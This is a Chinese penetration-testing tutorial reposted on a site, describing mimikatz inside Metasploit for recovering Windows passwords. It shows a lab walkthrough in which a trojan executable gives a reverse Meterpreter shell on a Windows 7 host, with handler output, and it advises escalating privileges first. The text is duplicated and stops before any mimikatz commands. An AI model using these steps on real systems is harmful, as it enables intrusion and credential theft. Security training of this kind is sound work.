admin管理员组文章数量:1026989
mimikatz工具简介
mimikatz是一款强大的系统密码破解获取工具。该工具有段时间是作为一个独立程序运行。现在已被添加到Metasploit框架中,并作为一个可加载的Meterpreter模块。当成功的获取到一个远程会话时,使用mimikatz工具可以很快的恢复密码。本节将介绍使用mimikatz工具恢复密码。
windows2012以下的系统给可直接获取到明文,2012以上的系统只能获取到hash值。
实例演示
(1)通过在目标主机(Windows 7)上运行kali创建的可执行文件木马程序backup.exe,获取一个远程会话。如下所示:
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] Starting the payload handler…
[*] Sending stage (769536 bytes) to 192.168.6.110
[*] Meterpreter session 2 opened (192.168.6.103:4444 -> 192.168.6.110:1523) at 2014-07-19 16:54:18 +0800
meterpreter >
从输出的信息中,可以看到获取到了一个与目标靶机的远程会话。
(2)确认目标用户的权限。执行命令如下所示:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
tips:注意,运行此工具执行命令需要管理员权限,所以我个人建议在内网渗透中首先应该进行提权
mimikatz工具简介
mimikatz是一款强大的系统密码破解获取工具。该工具有段时间是作为一个独立程序运行。现在已被添加到Metasploit框架中,并作为一个可加载的Meterpreter模块。当成功的获取到一个远程会话时,使用mimikatz工具可以很快的恢复密码。本节将介绍使用mimikatz工具恢复密码。
windows2012以下的系统给可直接获取到明文,2012以上的系统只能获取到hash值。
实例演示
(1)通过在目标主机(Windows 7)上运行kali创建的可执行文件木马程序backup.exe,获取一个远程会话。如下所示:
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.6.103:4444
[*] Starting the payload handler…
[*] Sending stage (769536 bytes) to 192.168.6.110
[*] Meterpreter session 2 opened (192.168.6.103:4444 -> 192.168.6.110:1523) at 2014-07-19 16:54:18 +0800
meterpreter >
从输出的信息中,可以看到获取到了一个与目标靶机的远程会话。
(2)确认目标用户的权限。执行命令如下所示:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
tips:注意,运行此工具执行命令需要管理员权限,所以我个人建议在内网渗透中首先应该进行提权
版权声明:本文标题:Kali破解windows系统用户名密码工具mimikatz 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://it.en369.cn/jiaocheng/1735613173a1339088.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论